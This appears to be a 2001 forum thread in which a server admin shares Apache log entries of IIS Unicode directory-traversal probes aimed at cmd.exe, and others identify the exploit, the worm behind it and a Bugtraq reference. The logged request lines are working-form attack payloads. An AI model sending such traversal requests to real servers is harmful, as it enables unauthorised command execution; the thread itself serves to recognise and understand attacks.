check this:

anode@stout:/usr/local/apache/logs$ grep cmd.exe *
access_log:207.213.220.70 - - [07/Apr/2001:06:26:00 -0700] "GET /scripts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af.. %c0%af..%c0%af/winnt/system32/cmd.exe?/c%20dir HTTP/1.0" 404 322
access_log:200.195.224.3 - - [02/Jun/2001:17:30:05 -0700] "HEAD /msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 404 0
error_log:[Sat Apr 7 06:26:00 2001] [error] [client 207.213.220.70] File does not exist: /usr/local/apache/htdocs/scripts/..À¯..À¯..À¯..À¯..À¯..À¯..À¯..À¯/winnt/system32/cmd.exe
error_log:[Sat Jun 2 17:30:05 2001] [error] [client 200.195.224.3] File does not exist: /usr/local/apache/htdocs/msadc/..À¯../..À¯../..À¯../winnt/system32/cmd.exe


On an NT box, would this give up an "admin" dos shell or something?

Originally posted by nanode:
<STRONG>check this:

anode@stout:/usr/local/apache/logs$ grep cmd.exe *
access_log:207.213.220.70 - - [07/Apr/2001:06:26:00 -0700] "GET /scripts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af.. %c0%af..%c0%af/winnt/system32/cmd.exe?/c%20dir HTTP/1.0" 404 322
access_log:200.195.224.3 - - [02/Jun/2001:17:30:05 -0700] "HEAD /msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 404 0
error_log:[Sat Apr 7 06:26:00 2001] [error] [client 207.213.220.70] File does not exist: /usr/local/apache/htdocs/scripts/..À¯..À¯..À¯..À¯..À¯..À¯..À¯..À¯/winnt/system32/cmd.exe
error_log:[Sat Jun 2 17:30:05 2001] [error] [client 200.195.224.3] File does not exist: /usr/local/apache/htdocs/msadc/..À¯../..À¯../..À¯../winnt/system32/cmd.exe


On an NT box, would this give up an "admin" dos shell or something?</STRONG>

I imagine at best it would let you download cmd.exe Which is pretty useless. Kinda like downloading the bash executable.

JD

nanode,

You need to keep up on your security ole buddy. This is an OLD October 2000 exploit that went around that has become very mainstream in the last month or so. Remember when China was hacking the US because of the damn plane landing in their country? Well they began hacking US computers with a worm that exploits Solaris machines running sadmind and from there the infected Solaris machine will attempt to scan for IIS servers and run the Unicode exploit on it overwriting the default DirectoryIndex files with:
"FSCK THE US GOVERNMENT FSCK POISON CLAN"

This was such an outbreak that it caused one of the true great defacement site archives http://www.attrition.org to call it quits because it couldn't keep up. There were over 10,000 Hacked sites in a period of about a month.

Here is the Bugtraq Info on the Unicode attack you received on your machine if you want to learn more:
http://www.securityfocus.com/frames/?content=/vdb/bottom.html%3Fvid%3D1806

I bet both of those machines that were attacking you are just r00ted Solaris boxes.

Lemme know if ya need anymore help :D

r00t619:

Thanks for the update. &lt;sarcasm&gt;I'm not in the habit of reading NT exploits since I don't run it on any personal machines.&lt;/sarcasm&gt; :)

I should create a bogus directory structure to mimic winNT. In that dir. place a plain text file name cmd.exe the contents will be something offsensive.

If that's a completely ridiculous idea, let me know ;)

"FSCK THE US GOVERNMENT FSCK POISON CLAN"

It's kind of funny that Chinese script-kiddies speak better English than most American or English script-kiddies do.

what you say?!??